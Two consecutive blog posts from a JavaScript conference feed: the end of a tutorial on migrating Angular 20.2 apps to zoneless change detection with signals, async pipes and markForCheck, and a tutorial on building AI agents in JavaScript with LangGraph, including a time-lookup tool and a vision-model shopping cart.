When an asynchronous task triggers a change in a signal, this update does not mark all ancestors as dirty. Instead, only the component consuming that signal (the “consumer”) is tagged as dirty.

"Local" change detection - Marking consumer dirty and ancestors with flag HasChildViewsToRefresh

Figure 17: “Local” change detection – Marking consumer dirty and ancestors with flag HasChildViewsToRefresh

But what about its ancestors? Ancestors aren’t marked as dirty, but instead receive a special marker called HasChildViewsToRefresh (Figure 17). This marker tells Angular that the component itself is clean, but it has children that need to be refreshed.

During change detection, Angular starts traversal from the root, skipping any OnPush components that aren’t dirty. However, when it encounters a component with the HasChildViewsToRefresh flag, it knows to continue down into its subtree. In this way, Angular bypasses clean components and focuses only on the path that leads to the consumer of the changed signal, ensuring that updates are applied exactly where they are needed (Figure 18).

It’s important to note that this optimization only works if the signal update isn’t triggered by mechanisms that already mark components as dirty (for example, event listener). In that case, the ancestors will be marked both as dirty and with the HasChildViewsToRefresh flag, which means Angular will check them as well.

"Local" change detection - Angular runs check detection only in component where signal value changed

Figure 18: “Local” change detection – Angular runs check detection only in component where signal value changed

Summing up this section: a trigger starts the process, and the strategy decides its scope. Now it’s time to see what preparation is needed before going zoneless.

Preparing for Zoneless

If we want to go zoneless, we first need to prepare our apps. It’s not just about removing Zone.js, we also need to make sure our components know how to notify Angular about changes. In other words, we have to replace the “magic” that Zone.js gave us with explicit signals, async pipes, or markForCheck calls. Once that’s in place, the transition becomes smooth and more predictable.

The very first step is to switch all components to the OnPush change detection strategy. Why? Because it immediately reveals what will stop working once Zone.js is gone. By forcing Angular to update only when explicitly notified, we can clearly see which parts of the app rely on Zone.js magic, and fix them before the actual migration.

Let’s look at some examples to see the most common issues you’ll run into, and which solutions will continue to work just fine. All examples below are shown using Angular 20.2, since that’s the version where zoneless mode is stable and safe to adopt.

View of an example component showing ship crew members

Figure 19: View of an example component showing ship crew members

I’ll start with a simple example, a component that displays the ship crew. Initially, everything works fine, we fetch the crew list with an HTTP request, subscribe to it in the component, and assign the result to a crewMembers variable. The template shows the first loading message, and then the data.

Listing 1:

@Component({
  selector: 'app-crew-widget',
  imports: [AddCrewModalComponent, ConfirmDialogComponent],
  templateUrl: './crew-widget.component.html',
  styleUrls: ['./crew-widget.component.scss'],
})
export class CrewWidgetComponent implements OnInit {
  protected crewMembers: CrewMember[] = [];
  protected isLoading = true;
  private crewService = inject(CrewService);
  private destroyRef = inject(DestroyRef);

  ngOnInit(): void {
    this.crewService.getCrewMembers()
    .pipe(
	finalize(() => this.isLoading = false),
      takeUntilDestroyed(this.destroyRef)
    )
    .subscribe(members => {
      this.crewMembers = members;
    });
  }
}

But once we switch the component to the OnPush change detection strategy, things suddenly break. Instead of the crew list, we keep seeing the “loading” state, even though the HTTP call has already completed. Why does this happen?

View of an example component with loading state, when onPush strategy was turned on

Figure 20: View of an example component with loading state, when onPush strategy was turned on

Previously, Zone.js automatically tracked async tasks, such as HTTP requests. When the request finished, it triggered change detection for us. Without Zone.js, nothing notifies Angular that the data has arrived, so the UI never updates.

At this point, we have to trigger change detection ourselves. One option is to inject ChangeDetectorRef and call markForCheck after updating crewMembers. You can use it if you have to, but there are usually better options.

Listing 2 – markForCheck:

@Component({
  selector: 'app-crew-widget',
  imports: [AddCrewModalComponent, ConfirmDialogComponent],
  templateUrl: './crew-widget.component.html',
  styleUrls: ['./crew-widget.component.scss'],
  changeDetection: ChangeDetectionStrategy.OnPush
})
export class CrewWidgetComponent implements OnInit {
  protected crewMembers: CrewMember[] = [];
  private crewService = inject(CrewService);
  private destroyRef = inject(DestroyRef);
  private changeDetector = inject(ChangeDetectorRef);

  ngOnInit(): void {
    this.crewService.getCrewMembers()
    .pipe(
      finalize(() => this.isLoading = false),
      takeUntilDestroyed(this.destroyRef)
    )
    .subscribe(members => {
      this.crewMembers = members;
      this.changeDetector.markForCheck();
    });
  }

Template:

<div class="crew-widget">
  <div class="header">
    <h2>Crew Members</h2>
  </div>
  @if(!isLoading) {
    <ul class="crew-list">
      @for(member of crewMembers; track member.id) {
                  <!-- Member content -->
      }
      @empty {
        <li class="empty-crew">No crew members aboard yet.</li>              
      }
    </ul>
  } @else {
    <div class="loading”>
      <span>Loading crew members...</span>
    </div>
  }
</div>

A much better approach is to use the async pipe. It eliminates the need for manual subscription logic in your component and guarantees that Angular updates the view whenever data changes.

Listing 3 – Async Pipe:

@Component({
  selector: 'app-crew-widget',
  imports: [AddCrewModalComponent, ConfirmDialogComponent, AsyncPipe],
  templateUrl: './crew-widget.component.html',
  styleUrls: ['./crew-widget.component.scss'],
  changeDetection: ChangeDetectionStrategy.OnPush
})
export class CrewWidgetComponent {
  private crewService = inject(CrewService);
  crewMembers$ = this.crewService.getCrewMembers();

Template:

<div class="crew-widget">
  <div class="header">
    <h2>Crew Members</h2>
  </div>
  @let crewMembers = crewMembers$ | async;
  @if(crewMembers) {
    <ul class="crew-list">
      @for(member of crewMembers; track member.id) {
                  <!-- Member content -->
      }
      @empty {
        <li class="empty-crew">No crew members aboard yet.</li>
      }
    </ul>
  } @else {
    <div class="loading”>
      <span>Loading crew members...</span>
    </div>
  }
</div>

We can also take advantage of toSignal. With it, we transform an observable into a signal inside our component. Whenever the observable emits a new value, the signal’s value is updated, and Angular reacts right away. Subscriptions are managed under the hood, so we avoid the extra boilerplate of manual unsubscribe logic. In the template, we just use our signal instead of the observable, but we have to call it with (), e.g., crewmember(), to get a signal’s value.

Listing 4 – Signals:

@Component({
  selector: 'app-crew-widget',
  imports: [AddCrewModalComponent, ConfirmDialogComponent, AsyncPipe],
  templateUrl: './crew-widget.component.html',
  styleUrls: ['./crew-widget.component.scss'],
  changeDetection: ChangeDetectionStrategy.OnPush
})
export class CrewWidgetComponent {
  private crewService = inject(CrewService);
  crewMembers = toSignal(this.crewService.getCrewMembers());

Template:

<div class="crew-widget">
  <div class="header">
    <h2>Crew Members</h2>
  </div>
  @if(crewMembers()) {
    <ul class="crew-list">
      @for(member of crewMembers(); track member.id) {
          <!-- Member content -->
      }
      @empty {
        <li class="empty-crew">No crew members aboard yet.</li>
      }
    </ul>
  } @else {
    <div class="loading”>
      <span>Loading crew members...</span>
    </div>
  }
</div>

Beyond async pipes and signals, there’s also a new player: httpResource. It’s still experimental, but it already works seamlessly in a zoneless environment. Why? Because it doesn’t rely on Zone.js at all, it exposes its state through signals, making it a natural fit for the new change detection model.

Listing 5 – httpResource:

@Component({
  selector: 'app-crew-widget',
  imports: [AddCrewModalComponent, ConfirmDialogComponent, AsyncPipe],
  templateUrl: './crew-widget.component.html',
  styleUrls: ['./crew-widget.component.scss'],
  changeDetection: ChangeDetectionStrategy.OnPush
})
export class CrewWidgetComponent {
 crew = httpResource<CrewMember[]>(() => `http://localhost:3000/crew`);

Template:

<div class="crew-widget">
  <div class="header">
    <h2>Crew Members</h2>
  </div>
  @if(crew.hasValue()) {
    <ul class="crew-list">
      @for(member of crew.value(); track member.id) {
    <!-- Member content -->
      }
      @empty {
        <li class="empty-crew">No crew members aboard yet.</li>
      }
    </ul>
  }
  @if(crew.isLoading()) {
    <div class="loading ">
      <span>Loading crew members...</span>
    </div>
  }
</div>

Another common pitfall comes from using setTimeout or setInterval. In a zoneless app, they no longer trigger change detection automatically. If your code relies on them, you’ll need to adjust it before migrating. Depending on the case, you can either call markForCheck to notify Angular manually or update a signal value directly. Just remember, for the signal update to refresh the UI, it has to be read in the template. If you’re working with an observable, ensure it’s consumed via the async pipe, so updates are picked up correctly.

Listing 6 – setInterval not triggering change detection in zoneless app:

rumStockValue = 100;

//some code

setInterval(() => {
      this.rumStockValue = this.simulateRumConsumption();
    }, 10000);

Listing 7 – setInterval with signal value change:

rumStockValue = signal(100);

//some code

setInterval(() => {
      this.rumStockValue.set(this.simulateRumConsumption());
    }, 10000);

Angular also gives us a safety net to verify that our app is truly zoneless-ready. With provideCheckNoChangesConfig({ exhaustive: true, interval: < milliseconds > }) to app.config.ts, we can enable a periodic debug check that ensures no state changes slip by unnoticed. If Angular detects a binding update that wouldn’t have been refreshed by zoneless change detection, it throws an ExpressionChangedAfterItHasBeenCheckedError. This helps us catch hidden dependencies on Zone.js before they become real issues in production.

Listing 8:

export const appConfig: ApplicationConfig = {
  providers: [
    provideBrowserGlobalErrorListeners(),
    provideZonelessChangeDetection(),
    provideCheckNoChangesConfig({exhaustive: true, interval: 1000}),
    provideRouter(routes),
    provideHttpClient(),
  ]
};

Angular throws ExpressionChangedAfterItHasBeenCheckedError when a binding changes without notifying change detection

Figure 21: Angular throws ExpressionChangedAfterItHasBeenCheckedError when a binding changes without notifying change detection

With this in place, we now have the full picture, how change detection behaves under different strategies, what pitfalls appear when removing Zone.js, and how tools like signals and the async pipe help us stay in control.

EVERYTHING AROUND ANGULAR

Explore the iJS Angular Development Track

Conclusion: The End of an Era, the Start of Another

Zone.js has been part of Angular from the very beginning, bringing the “magic refresh” that automatically kept UIs in sync. For years, it simplified development and allowed developers to focus on building features instead of managing updates manually. But as applications grew larger and the web evolved, the hidden costs of that magic became harder to ignore: performance overhead, noisy debugging, compatibility issues, and extra complexity in testing.

That’s why the shift to zoneless marks an important milestone in Angular’s evolution. Developers can finally build apps without Zone.js, relying instead on signals, markForCheck, and OnPush-friendly patterns.

Zone.js was magic. Zoneless is mastery. With Angular 20.2, you can finally leave the overhead behind, build apps that are faster and easier to debug, and take full control of change detection. The future of Angular is zoneless. It’s time to join it.

References

  1. Angular documentation
  2. Angular Summer Update 2025

 

🔍 Frequently Asked Questions (FAQ)

1. What is zoneless mode in Angular?

Zoneless mode in Angular removes the need for Zone.js to trigger change detection. Instead, updates rely on explicit triggers like signals, template events, or markForCheck().

2. Why did Angular move away from Zone.js?

Angular phased out Zone.js to improve performance, reduce bundle size, simplify debugging, and give developers explicit control over UI updates.

3. Which Angular version introduced stable zoneless mode?

Zoneless mode became stable with Angular 20.2. Earlier versions, like Angular 18, included experimental support for it.

4. How do you enable zoneless mode in a new Angular project?

You can enable zoneless mode using the --zoneless flag when creating a project with Angular CLI 20.2+, or by choosing the zoneless option when prompted during setup.

5. How does change detection work without Zone.js?

In zoneless Angular, change detection is triggered by user events, signal updates, async pipes, or manual calls to markForCheck() instead of monkey-patched async APIs.

6. What are the trade-offs of migrating to zoneless Angular?

You lose automatic change detection and must refactor to use signals or the OnPush strategy. Legacy code tied to Zone.js may require adjustments.

7. What tools help validate a zoneless Angular app?

Use provideCheckNoChangesConfig({ exhaustive: true }) to enable runtime checks. It detects untracked changes and helps confirm you’re zoneless-ready.

8. What role does Angular 20 play in preparing for Angular 21?

Angular 20 introduces stable zoneless APIs and paves the way for deeper reactivity primitives and simplifications in Angular 21. The transition marks a strategic shift towards a leaner core and more modern development model.

The post No More Zone.js: A Better Way to Build Angular Apps with Angular 20.2 appeared first on International JavaScript Conference.

]]>
Build an AI Agent with JavaScript and LangGraph https://javascript-conference.com/blog/build-ai-agents-javascript-langgraph/ Wed, 17 Sep 2025 07:50:54 +0000 https://javascript-conference.com/?p=108401 Artificial intelligence has evolved far beyond just chat applications. Features powered by large language models (LLMs) are now being integrated into a growing number of apps and devices. Many web platforms offer not only AI chatbots but also intelligent search functions that help users find relevant content, as well as fraud detection systems that use anomaly detection to identify suspicious login attempts or fraudulent online payments. Let’s look at an example of how to build such an application using LangGraph.

The post Build an AI Agent with JavaScript and LangGraph appeared first on International JavaScript Conference.

]]>
One thing in common between all the systems mentioned is that they accept input and generate output based on their trained knowledge. This output can then be processed by the application and presented to the user. A concrete example of such an AI application is a smart lamp. It has been trained to respond to specific commands such as “Turn on the light,” “Dim the light to 50%,” or “Turn off the light at 10 p.m.” The system is limited by its architecture and training data.

AI agents address this problem. These are software components that are capable of making decisions independently and executing actions based on those decisions. In the example with the smart lamp, one goal for the AI agent could be to always provide the perfect lighting without you worrying about it. The agent observes when you wake up and how lighting conditions change with the weather and time of day. It decides when it makes sense to turn on the light. For instance, if you want to sleep longer on Sundays, the light will turn on later. The actions it takes might include gradually brightening the light in the morning when you wake up or shifting to a warmer color tone in the evening as you wind down. Over time, the AI agent learns more about your habits–for example, preferring to switch to cinema mode when you watch a movie in the evening or using more natural light in the afternoon.

The term AI agent is therefore not a new name for a semi-intelligent chatbot, but refers to software with very specific characteristics:

  • Autonomy: The AI agent can act independently within a certain framework. It does not work purely on a command basis, but continuously observes its environment and acts on its own initiative. This enables it to react to its environment and pursue its goals in the long term. In the case of the smart lamp, this means that you do not have to switch the light on and off yourself. Depending on the application, an AI agent can allow interactions and learn from them. This means that you can still control the light yourself. The agent will then adapt its behavior in the future so that intervention should no longer be necessary.
  • Goal orientation: The actions of an AI agent are usually determined by a specific goal or a combination of several goals.
  • Interaction with complex environments: AI agents play to their strengths above all in dynamic and unpredictable environments. If you work in such an environment with conventional architectures, you have to anticipate a wide variety of cases. An AI agent can respond to events in its environment, adapt its behavior, and get to know its environment better over time. The smart lamp not only takes the time of day into account in its actions, but also your behavior and habits, as well as external influences such as sunrise, sunset, or the weather.
  • Learning over a longer period of time: AI agents can learn from their environment. This includes both dynamic changes in the environment and interactions between people or other systems and the agent. The smart lamp not only turns the light on and off, but also ensures optimal lighting in different situations, whether you are reading a book, watching a movie, or preparing a meal.

For an AI agent to work, you must ensure that it can perceive its environment, give it a goal, and invest a certain amount of time in the initial learning process.

From Idea to Practice: AI Agents in JavaScript with LangGraph

AI agents can be implemented in different languages and on different platforms. The most commonly used languages are currently Python and JavaScript or TypeScript.

The LangChain library exists for both programming languages to implement AI applications in the form of chained modules. LangGraph, a library for modeling and implementing AI agents, comes from the same manufacturer. In this article, we use the JavaScript version of this library based on Node.js, which scores points with its lightweight architecture and asynchronous I/O.

The library focuses on controlling data flows and states in the application. It allows you to integrate any models and tools. The most important terms in a LangGraph application are:

  • State: The state contains information about the structure of the graph. It also stores the application’s variable data. The graph also has reducer functions that LangGraph can use to update the state.
  • Node: A graph generally consists of nodes and edges. In the specific case of LangGraph, a node is a JavaScript function that contains the agent’s logic. These functions can use an LLM, send queries to a search engine, or execute any local logic.
  • Edge: The edges of the graph connect the nodes of the graph and thus determine which node function is executed next.

A Concrete Example – What Time Is It?

To make things a little less abstract, let’s take a look at a concrete example. With this application, you can ask a locally executed LLM for the current time. If you use a simple local model such as Llama or Mistral, you can draw on an extensive knowledge base and be sure that your personal data will not be used for training purposes or analyzed in any other way, but the model cannot access current or dynamic data such as the date or time. In this example, you enrich the model with a function that returns the current date and time.

The implementation consists of two nodes: model, which is responsible for communicating with the LLM, and getCurrentDateTime, which contains the tool function for the date and time. The code in Listing 1 shows how the nodes are implemented and connected with edges.

Listing 1: LangGraph application with access to time and date

import { AIMessage, HumanMessage } from '@langchain/core/messages';
import { ToolNode } from '@langchain/langgraph/prebuilt';
import { StateGraph, MessagesAnnotation } from '@langchain/langgraph';
import { tool } from '@langchain/core/tools';
import { ChatOllama } from '@langchain/ollama';
import { z } from 'zod';

const getCurrentDateTime = tool(
  async () => {
    const now = new Date();
    const result = `Current date and time in UTC: ${now.toISOString()}`;
    return result;
  },
  {
    name: 'getCurrentDateTime',
    description: 'Returns the current date and time in UTC.',
    schema: z.object({}),
  }
);

const tools = [getCurrentDateTime];
const toolNode = new ToolNode(tools);

const model = new ChatOllama({ model: 'mistral-nemo' }).bindTools(tools);

function shouldContinue({ messages }: typeof MessagesAnnotation.State) {
  if ((messages[messages.length - 1] as AIMessage).tool_calls?.length) {
    return 'getCurrentDateTime';
  }
  return '__end__';
}

async function callModel(state: typeof MessagesAnnotation.State) {
  const response = await model.invoke(state.messages);
  return { messages: [response] };
}

const workflow = new StateGraph(MessagesAnnotation)
  .addNode('model', callModel)
  .addEdge('__start__', 'model')
  .addNode('getCurrentDateTime', toolNode)
  .addEdge('getCurrentDateTime', 'model')
  .addConditionalEdges('model', shouldContinue);

const app = workflow.compile();

const time = await app.invoke({
  messages: [new HumanMessage('How late is it?')],
});
console.log(time.messages.at(-1)?.content);

const timeMuc = await app.invoke({
  messages: [
    ...time.messages,
    new HumanMessage('And how late is it in Munich, Germany?'),
  ],
});

console.log(timeMuc.messages.at(-1)?.content);

The core of the implementation is the ToolNode, which supplies the LLM with current data. You create such a node by calling the tool function. You pass it the function that is to be behind the node. In this example, this function returns the current date and time as an ISO string. In addition to this function, you also define an object with meta information such as the name of the ToolNode, a description, and a schema. The bindTools method of the LLM instance is used to make the tools known. The LLM has access to the meta information and thus knows which tools are available to it for which purpose.

If the LLM receives a request that requires the current time to answer, it does not provide a direct answer, but informs the application that the ToolNode should be executed. In the example, the function can only be executed without receiving any additional parameters. However, you also have the option of defining parameters via the schema that the LLM passes on when called, and which you can access in the Tool function. This allows you to control the execution of this function and deliver a suitable result. It is important to define a description for the values in the schema using the describe method. The tool function does not yet create a node for LangGraph. To do this, you must pass the created object in an array to the constructor of the ToolNode class.

The second node in the graph is the model. In the example, the ChatOllama class is used to integrate a local LLM provided by Ollama. Specifically, the mistral-nemo model is used. Which LLM you choose depends on a variety of factors: Do you want to use a local open-source model such as Mistral or Llama, or would you prefer a commercial model such as GPT-4o from OpenAI? If you decide on a local model, the question arises as to what resources are available to you and whether you should opt for a smaller and therefore more economical model, such as the 3B variant of Llama 3.2, or a large model such as the Llama 3.1 model with 405B parameters. The smaller model can run efficiently on a computer with a standard graphics card. The large models require powerful and therefore expensive hardware.

With these two nodes, you can now proceed to create the state graph for the application. When creating the graph, you pass a structure that defines the state structure and a reducer function for updating the state. LangGraph provides the MessagesAnnotation, which only provides a state key with the name messages and the associated reducer. The instance of the StateGraph class has the methods addNode for adding nodes and addEdge for connecting the nodes. Figure 1 shows the graph for the example.

Structure of the application graph

Figure 1: Structure of the application graph

The graphical representation reveals another special feature. You can use the addConditionalEdges method to insert a branch. Implement this in the shouldContinue function. It receives all messages and checks whether the last message from the model contains a Tool call. If this is the case, the process is forwarded to the ToolNode. Otherwise, the run is terminated. A complete run through the graph looks like this:

  1. The edge labeled start marks the start of the graph and connects it to the model.
  2. The model node is executed. The model receives the prompt, processes it, and returns the result.
  3. The edge inserted with the addConditionalEdges method checks whether a Tool call is required. If this is not the case, the run is terminated with end. Otherwise, the edge connects the model to the ToolNode.
  4. The ToolNode is called and returns the current date and time.
  5. The edge connecting the ToolNode and the model ensures that the state enriched by the output of the Tool function is made available to the model.
  6. The model receives the extended prompt and can generate a response.
  7. The model does not require any further Tool calls, and the application is terminated by the conditional edge.

The compile method of the StateGraph instance creates an executable application to which you can pass any prompt using the invoke method. Assuming you call the application on December 1, 2025, at 3:02 p.m., you will receive the output “It’s currently 3:02 PM on December 1st.” As shown in the example, if you execute the invoke method again and pass the message history, the application does not execute another Tool call and uses the information from the previous run.

This example uses a Tool node to counteract the weakness of LLMs that do not know anything about current or dynamic data. It also shows the essential features of a LangGraph application, but also the limitations you face when integrating smaller language models. The responses are not always consistent. For most queries, the model responds with a correct answer. The time you return here is in the UTC time zone. If you ask for the current time in a different time zone, as in the second prompt, you may get the correct answer, but you may also find that Munich is suddenly in a time zone 6 hours behind UTC. In addition, during testing, the results for German queries were significantly worse than for the English version, even though all prompts were in German. To solve the time zone problem, you could, for example, register another tool that resolves the time zones correctly and uses this information to obtain the correct time. In the next example application, you will learn about another use case for LangChain that differs more significantly from the usual chatbot application.

This example already shows the essential features of a LangGraph application. The application consists of several nodes connected by edges. This architecture allows you to create both simple and very complex applications by assembling them from small, loosely coupled building blocks. The application gains additional flexibility because you can exchange nodes or insert new ones. You can also create conditions and thus take different paths through the graph at runtime. Although the time announcement example demonstrates some basic architectural features of LangGraph, it is still a long way from a real AI agent. For this reason, we will now look at another example of a LangGraph application that will introduce you to further features of an AI agent and show you other possible uses for the library.

Another Example: The Digital Shopping Cart

The following example relies less on an LLM to control the application and instead integrates an LLM to perform a very specific task. The rest of the application consists of a simple graph with a few additional nodes. The application is designed to evaluate images of products and recognize which and how many products are depicted. The products are placed in the shopping cart and the price for the individual products and the entire shopping cart is determined. At the end, the application outputs a tabular list of the shopping cart. The application is based on Node.js and is operated via the command line. The product images are stored in the file system and are read in when used. Communication takes place via command-line input.

One of the most common use cases for a LangGraph application is a chatbot. That’s why LangGraph also provides the MessagesAnnotation, which allows you to implement a message-based system without any further changes. However, you are not limited to this structure, but can model the state as you wish. The basis for this is provided by LangGraph’s Annotation structures. The GraphState of an application is structured like a tree and has a root node that you define with Annotation.Root. This then contains any object structure. Listing 2 shows how the GraphState of the sample application is structured.

Listing 2: Generating the GraphState

const schema = z.object({
  totalPrice: z.number(),
  cart: z.array(
    z.object({
      image: z.string(),
      name: z.string().optional(),
      price: z.number().optional(),
      quantity: z.number().optional(),
    })
  ),
});

type StateType = z.infer<typeof schema>;
type CartItem = StateType['cart'];

const cartAnnotation = {
  totalPrice: Annotation<number>,
  cart: Annotation<CartItem[]>,
};

const State = Annotation.Root(cartAnnotation);

The GraphState contains two fields: the total price in the totalPrice property and the shopping cart in the cart property. You model the details of the state using LangGraph’s Annotation functions. These are implemented as TypeScript generics so that you can pass the type of the respective property. The total price is a simple number, and the shopping cart consists of an array of objects representing the individual products. If you do not specify anything else in the Annotation functions, LangGraph will overwrite the previous value in the state when a change is made. Alternatively, you can call the Annotation function and pass it an object with a reducer function and a default value. The reducer is then responsible for generating the new state of the StateGraph from the previous state and additional data. In our example, the node functions of the application itself take care of updating the state, so no separate reducer function is required.

The state not only represents the current state of the application, but also serves to exchange information between the individual nodes. The nodes do not simply pass information to each other, but store it in the state. This has the advantage that the state of the application can be better understood. This makes the application more flexible, as you are not dependent on fixed interfaces between the nodes. If you persist the state, you can pause the execution of the application and continue at the same point without losing any data.

In addition to the state, the nodes and edges of the graph are the most important building blocks of the application. Figure 2 shows the nodes of the application and their connections. In the following, you will learn about the special features of the individual nodes and how they interact.

Visualization of GraphState

Figure 2: Visualization of GraphState

AskForNextProduct – Which Product Should Be Added?

The askForNextProduct node starts the process. It uses the Readline module from Node.js to query user input on the command line. The application expects the name of a file containing the image of a product. For example, you can enter “DSC_0435.jpg.” A file with this name must then be located in the application’s input directory and will be read in later in the graph. The node only takes care of querying the file name and must pass it on to the next node in the graph. So you need to save this info in the GraphState. To do this, the node adds a new element to the cart array and writes the file name to the image field. Entering a file name is a simplification for this app. At this point, you can implement any image source you want. For example, you can create a front end for the app and upload the images via the browser.

askForNextProduct has a special feature because it is connected to the detectProduct and showCart nodes via a ConditionalEdge. If you enter the string finished, this means that no further products should be added to the shopping cart and the shopping cart should be displayed. In this case, the ConditionalEdge calls the showCart node. In all other cases, the application continues with the detectProduct node to identify the product.

DetectProduct – Product Recognition with a Vision Model

In the example in Listing 3, the detectProduct node uses the llama3.2-vision:11b model for image recognition. The prompt is important here. You specify the context, i.e., that the model is to be used for product recognition and that the number of products found is to be counted. You also specify the output format in the form of a JSON string with a concrete example. You can pass both the name of the file and a Base64-encoded image directly to the Ollama library used here. By formulating the prompt in this way, you have ensured that you will receive valid JSON as a response, which you can insert directly into the last element of the shopping cart array in GraphState.

Listing 3: detectProduct ToolNode

const detectProduct = tool(
  async (state: StateType): Promise<StateType> => {
    console.log('Detecting product...');

    const { message } = await ollama.chat({
      model: 'llama3.2-vision:11b',
      messages: [
        {
          role: 'user',
          content: `You are a vision model for a pet shop. What 
            product do you see and how many are there. Answer in 
            the following json string structure 
            { "name": "name", "quantity": 1}`,
          images: [`./input/${state.cart[state.cart.length - 1].image}`],
        },
      ],
    });
    const visionModelResponse = JSON.parse(message.content);

    const clonedState = { ...state };
    clonedState.cart[clonedState.cart.length - 1] = {
      ...clonedState.cart[clonedState.cart.length - 1],
      ...visionModelResponse,
    };
    return clonedState;
  },
  {
    name: 'detectProduct',
    description: 'Detects a product.',
    schema,
  }
);

CalculatePrice – Read Data from the Database

This is another simplification for our example. The CalculatePrice node reads the name of the product from the last element of the shopping cart array and uses it for a database query. The result is the price of the product you are looking for. You can make the search for the right product as complex as you like. A simple extension would be to normalize the spelling so that it doesn’t matter whether you search for “apple” or “apples.” You can also use a smart, AI-based product search, which significantly improves the application but also significantly increases the response time in most cases.

In the example, we assume that a match was found for the image and the product name derived from it. The calculatePrice function adds the price to the corresponding shopping cart item and passes control to the calculateTotalPrice node configured in the application.

CalculateTotalPrice – Calculate the Sum

The calculateTotalPrice node is an example of a very simple operation. It uses the Array-reduce function to calculate the sum of the prices of all items in the shopping cart. In theory, you could also have a language model perform operations like this, but a calculation in the source code has the advantage that it always works, and you don’t have to worry about the language model starting to hallucinate and adding or omitting products or simply changing prices on its own. The code in Listing 4 also shows a simplification of LangGraph that allows you to update only part of the GraphState.

Listing 4: calculateTotalPrice ToolNode

const calculateTotalPrice = tool(
  async (state: StateType) => {
    console.log('Calculating total price...');
    const totalPrice = state.cart.reduce((acc, item) => {
      return acc + item.price! * item.quantity!;
    }, 0);
    console.log(`Current total price: ${totalPrice}`);
    return { totalPrice };
  },
  {
    name: 'calculateTotalPrice',
    description: 'Calculates the total price of the cart.',
    schema,
  }
);

As with the totalPrice property, if you only specify the structure of part of the GraphState, LangGraph will only update that part. Here, another standard behavior of the library comes into play. If you do not define a reducer function when creating the GraphState, LangGraph will overwrite the value with the update. For a simple number, this behavior is not a problem. However, with an object structure such as the cart state, this can become a problem. Here, you can implement the desired behavior yourself using a reducer.

After updating the total price, the loop in the StateGraph closes and the askForNextProduct node waits for the next input until the cycle is interrupted by the input of finished and the entire shopping cart is displayed.

ShowCart – Displaying the Shopping Cart

Before the application is terminated, the shopping cart is displayed on the console. The showCart node uses the console.table function for this purpose and draws from the GraphState. This node only accesses the state in read-only mode and outputs it unchanged as the return value. This node is also the end of the GraphState and is connected via an edge to the end node, which terminates the application.

The Nodes and Edges of the Application

As in the previous example, you use the StateGraph class, to which you pass the configured state during instantiation. Use the addNode, addEdge, and addConditionalEdges functions to define the nodes and connect them with edges. Call the compile function on the resulting object and then start the application by calling the invoke method, as shown in Listing 5.

Listing 5: Registration of nodes and edges

const graph = new StateGraph(State)
  .addNode('detectProduct', detectProduct)
  .addNode('calculatePrice', calculatePrice)
  .addNode('calculateTotalPrice', calculateTotalPrice)
  .addNode('showCart', showCart)
  .addNode('askForNextProduct', askForNextProduct)
  .addEdge('__start__', 'askForNextProduct')
  .addEdge('detectProduct', 'calculatePrice')
  .addConditionalEdges('askForNextProduct', showCartOrDetectProduct as any)
  .addEdge('calculatePrice', 'calculateTotalPrice')
  .addEdge('calculateTotalPrice', 'askForNextProduct')
  .addEdge('showCart', '__end__');

const app = graph.compile();

app.invoke({ totalPrice: 0, cart: [] });

When starting, you pass an initial state structure and enter the StateGraph. The graph of this application describes a circle. Here, you must be careful not to accidentally construct an infinite loop. LangGraph defines a limit of 25 cycle runs before it throws a GraphRecursionError. However, this only occurs if you do not integrate an interruption. This is relevant for the example because the keyboard input in the askForNextProduct node is not considered a termination condition for the cycle. The size of your application’s shopping cart is therefore limited by this restriction. To mitigate the restriction and increase the shopping cart size, pass an object with the property recursionLimit as the second argument to the invoke method when starting the application and define a value greater than 25. Of course, you can also pass a smaller value to test the effects of the restriction.

Conclusion

If your AI application consists solely of direct communication with a language model, it is usually sufficient to use the appropriate npm package, such as OpenAI or Ollama. However, if you want to integrate the model into a larger application context and use additional information sources or implement your own logic, an additional library is recommended. One example of this is LangChain. This tool allows you to flexibly link the individual components of your application together to form a chain. However, this architecture reaches its limits, especially in larger and more complex use cases. LangGraph, from the creators of LangChain, extends the architecture of an AI application to a graph in which you have the option of branching and looping.

The advantage of this graph architecture is that you can assemble your application from individual nodes. The connections between these nodes and the edges determine the flow of the application, but not the data flow. The data in the graph is stored in the state, an object structure that you can design according to your needs. This central state allows you to persist the state of your application and pause your application if necessary, and resume it at a later point in time.

The nodes are independent of the actual application, so you can move the implementation to a library or package and achieve reusability across application boundaries. All you have to do is make sure that the underlying state structure fits, which is easy with Zod for schema definition, validation, and TypeScript.

🔍 Frequently Asked Questions (FAQ)

1. What is LangGraph and how does it differ from LangChain?

LangGraph is a library for building AI agents using graph-based architecture in JavaScript or TypeScript. Unlike LangChain, which connects components in a linear chain, LangGraph uses nodes and edges to model dynamic control flows including branching and looping.

2. How do AI agents differ from traditional LLM-powered applications?

AI agents act autonomously within defined environments, continuously observe their surroundings, and make decisions based on long-term goals. This is in contrast to typical LLM applications, which respond only to direct prompts without proactive behavior.

3. What are the core components of a LangGraph application?

The three main components are nodes (functions that perform tasks), edges (transitions between nodes), and the state (a shared data object accessible and modifiable by all nodes). LangGraph also supports conditional logic via reducer functions and annotations.

4. Can LangGraph applications access real-time data?

Yes. LangGraph can integrate tools as nodes—for instance, a node that returns the current UTC date and time—allowing applications to supplement static model knowledge with dynamic, real-world data.

5. What role does the ToolNode play in a LangGraph setup?

The ToolNode provides real-time or auxiliary functionality by executing predefined logic, such as accessing current timestamps or running a custom function. It can be triggered by the model when a specific task cannot be completed with its internal knowledge alone.

6. How does LangGraph handle conditional logic and tool invocation?

LangGraph supports conditional edges via methods like addConditionalEdges. These allow the graph to evaluate conditions (e.g., tool calls in the model output) and dynamically choose which node to execute next.

5. How does the digital shopping cart example showcase LangGraph’s flexibility?

The digital shopping cart uses LangGraph nodes for reading product images, recognizing items via vision models, querying a database for prices, and calculating totals. This highlights how LangGraph enables stateful, multi-step applications beyond basic chatbot use cases.

6. Why is centralized state important in LangGraph applications?

Centralized state allows for easy debugging, flexible data exchange between nodes, and the ability to persist and resume sessions. This design makes LangGraph particularly suited for complex workflows that require memory and context retention across multiple steps.

The post Build an AI Agent with JavaScript and LangGraph appeared first on International JavaScript Conference.

]]>
